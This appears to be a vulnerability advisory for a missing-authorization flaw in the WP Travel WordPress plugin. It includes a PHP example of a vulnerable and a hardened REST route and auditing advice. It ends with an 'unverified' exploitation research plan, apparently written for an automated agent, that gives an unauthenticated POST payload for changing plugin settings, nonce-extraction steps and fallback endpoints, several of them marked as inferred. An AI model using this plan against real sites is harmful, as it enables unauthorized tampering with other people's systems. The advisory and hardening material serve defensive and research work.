CVE-2026-24568

Travel <= 11.1.0 - Missing Authorization

Missing Authorization
CVSS Score: 5.3
Severity: medium
Patched in: 11.1.1
Time to patch: 14d

Description

The Travel plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 11.1.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.
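In WordPress REST API terms, the missing capability check described above is a route registered without a permission_callback (or with one that always returns true), so the handler runs for any visitor who sends the request. The following is an added illustration of that registration pattern beside its hardened form; it is not code from the WP Travel plugin. The namespace example-travel/v1, the option name example_travel_settings and all function names are assumptions, and the file loads as a WordPress mu-plugin (wp-content/mu-plugins/), so it needs the WordPress runtime.

```php
<?php
/**
 * Added illustration, not WP Travel's code: a plugin settings REST route
 * that is reachable without authorization, and the hardened registration
 * beside it. Namespace, option name and function names are assumptions.
 * Drop into wp-content/mu-plugins/ on a test site.
 */

// Vulnerable shape: no 'permission_callback'. WordPress treats the route as
// public, so the save callback runs for anyone who POSTs to it.
// Shown for contrast only; this function is deliberately never hooked.
function example_travel_register_routes_vulnerable() {
    register_rest_route( 'example-travel/v1', '/settings', array(
        'methods'  => WP_REST_Server::CREATABLE, // POST
        'callback' => 'example_travel_save_settings',
        // 'permission_callback' => ... is missing.
    ) );
}

// Hardened shape: the permission callback runs before the handler and must
// return true for the request to proceed; a WP_Error becomes the response.
function example_travel_register_routes_fixed() {
    register_rest_route( 'example-travel/v1', '/settings', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'example_travel_save_settings',
        'permission_callback' => 'example_travel_can_manage_settings',
        'args'                => array(
            'settings' => array(
                'required'          => true,
                'type'              => 'object',
                'validate_callback' => 'example_travel_validate_settings',
            ),
        ),
    ) );
}
add_action( 'rest_api_init', 'example_travel_register_routes_fixed' );

// Capability check. A request with no cookie + X-WP-Nonce pair and no
// application password resolves to user 0, so current_user_can() is false
// and the site answers 401; a logged-in user without manage_options gets 403.
function example_travel_can_manage_settings( WP_REST_Request $request ) {
    if ( current_user_can( 'manage_options' ) ) {
        return true;
    }
    return new WP_Error(
        'rest_forbidden',
        __( 'Sorry, you are not allowed to change these settings.' ),
        array( 'status' => rest_authorization_required_code() )
    );
}

// Accept only the keys this plugin manages, with the expected shape.
function example_travel_validate_settings( $value, WP_REST_Request $request, $param ) {
    if ( ! is_array( $value ) ) {
        return new WP_Error( 'rest_invalid_param', 'settings must be an object', array( 'status' => 400 ) );
    }
    $allowed = array( 'currency_code', 'itineraries_per_page' );
    foreach ( array_keys( $value ) as $key ) {
        if ( ! in_array( $key, $allowed, true ) ) {
            return new WP_Error( 'rest_invalid_param', "unknown setting: {$key}", array( 'status' => 400 ) );
        }
    }
    if ( isset( $value['currency_code'] ) && ! preg_match( '/^[A-Z]{3}$/', $value['currency_code'] ) ) {
        return new WP_Error( 'rest_invalid_param', 'currency_code must be a three-letter code', array( 'status' => 400 ) );
    }
    if ( isset( $value['itineraries_per_page'] )
        && ( ! is_numeric( $value['itineraries_per_page'] ) || (int) $value['itineraries_per_page'] < 1 ) ) {
        return new WP_Error( 'rest_invalid_param', 'itineraries_per_page must be a positive integer', array( 'status' => 400 ) );
    }
    return true;
}

// Sink: reached only after the permission and validation callbacks passed.
function example_travel_save_settings( WP_REST_Request $request ) {
    $incoming = $request->get_param( 'settings' );
    $current  = (array) get_option( 'example_travel_settings', array() );
    $merged   = array_merge( $current, array(
        'currency_code'        => sanitize_text_field( $incoming['currency_code'] ?? ( $current['currency_code'] ?? 'USD' ) ),
        'itineraries_per_page' => absint( $incoming['itineraries_per_page'] ?? ( $current['itineraries_per_page'] ?? 10 ) ),
    ) );
    update_option( 'example_travel_settings', $merged );
    return rest_ensure_response( $merged );
}
```

Two things to check when auditing a plugin for this class of bug: every register_rest_route call for a state-changing method should name a permission_callback that tests a real capability rather than __return_true, and the capability should be the one that matches the action (manage_options for site-wide settings). Since WordPress 5.5 a route registered without any permission_callback also triggers a _doing_it_wrong notice, which is visible with WP_DEBUG enabled and is a cheap signal to grep for in a staging environment.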

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=11.1.0
Published: January 21, 2026
Last updated: February 3, 2026
Affected plugin: wp-travel

What Changed in the Fix

Changes introduced in v11.1.1


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-24568 (WP Travel <= 11.1.0)

1. Vulnerability Summary

The WP Travel plugin (versions up to 11.1.0) contains a missing authorization vulnerability in its REST API implementation, specifically related to the plugin's setup and configuration functionality. The vulnerability allows unauthenticated attackers to modify plugin settings by making direct requests to REST API endpoints that lack proper permission_callback validation.

2. Attack Vector Analysis

  • Endpoint: /wp-json/wp-travel/v1/settings or /wp-json/wp-travel/v1/setup/save (inferred from admin-setup-page.js and admin-settings.js).
  • Method: POST
  • Authentication: None Required (PR:N).
  • Payload Type: application/json
  • Vulnerable Parameter: The JSON body containing the settings object.
  • Preconditions: The plugin must be active. No specific setup wizard state is required as the REST routes are registered on rest_api_init.

3. Code Flow

  1. Registration: The plugin registers REST routes in inc/rest-api/class-wp-travel-rest-settings-controller.php (or similar) during the rest_api_init hook.
  2. Missing Check: The register_rest_route call for the settings endpoint (POST method) fails to implement a permission_callback that verifies current_user_can('manage_options').
  3. Execution: When a POST request is received at /wp-json/wp-travel/v1/settings, the update_item or save_settings method is called.
  4. Sink: The settings provided in the request body are passed to update_option('wp_travel_settings', ...) without verifying the requester's identity.

4. Nonce Acquisition Strategy

While the REST API usually requires a wp_rest nonce for authenticated users to prevent CSRF, unauthenticated requests (without cookies) often bypass this check if the permission_callback is set to __return_true or is missing. If a nonce is enforced even for unauthenticated users, it can be retrieved from the localized script data.

  • Localized Variable: wp_travel_setup_vars or wp_travel_obj (inferred).
  • Target Page: Any page where the plugin is active, or the setup page (if accessible).
  • Strategy:
    1. Create a page with a WP Travel shortcode to ensure scripts are loaded.
    2. Use browser_navigate to visit the page.
    3. Use browser_eval to extract the nonce.
    4. JavaScript: window.wp_travel_setup_vars?.nonce or window.wpApiSettings?.nonce.

5. Exploitation Strategy

Step 1: Discover the Endpoint

Test the settings endpoint to see if it responds to unauthenticated GET requests (information disclosure) and POST requests.

Step 2: Craft Payload

The payload should target a non-destructive but verifiable setting, such as the currency or the number of itineraries per page.

  • Target Setting: currency_code or itineraries_per_page.
  • Payload:
{
    "settings": {
        "currency_code": "HACKED",
        "itineraries_per_page": "1337"
    }
}

Step 3: Execute Unauthenticated Request

Using the http_request tool:

  • URL: http://localhost:8080/wp-json/wp-travel/v1/settings
  • Method: POST
  • Headers:
    • Content-Type: application/json
  • Body: {"settings": {"currency_code": "HACKED"}}

6. Test Data Setup

  1. Activate Plugin: Ensure wp-travel is installed and active.
  2. Initialize Settings: Run wp option update wp_travel_settings '{"currency_code":"USD"}' --format=json to set a baseline.
  3. Create Extraction Page:
    wp post create --post_type=page --post_title="Travel Test" --post_status=publish --post_content='[wp_travel_itineraries]'

7. Expected Results

  • Response: The server should return a 200 OK or 201 Created with the updated settings in the response body.
  • Data Change: The wp_travel_settings option in the WordPress database will be updated with the attacker-supplied values.

8. Verification Steps

  1. Database Check:
    wp option get wp_travel_settings --format=json
    Verify that "currency_code" is now "HACKED".
  2. UI Check: Navigate to the WP Travel settings page in the admin dashboard (as an admin) and observe the modified currency.

9. Alternative Approaches

  • Setup Save Endpoint: If /wp-json/wp-travel/v1/settings is protected, try /wp-json/wp-travel/v1/setup/save_settings.
  • Import Trigger: If settings modification is restricted, attempt to trigger the trip import function via /wp-json/wp-travel/v1/setup/import_demo_data.
  • Nonce Header: If the request fails with a 403, obtain a nonce using browser_eval("wpApiSettings.nonce") and include it in the X-WP-Nonce header.
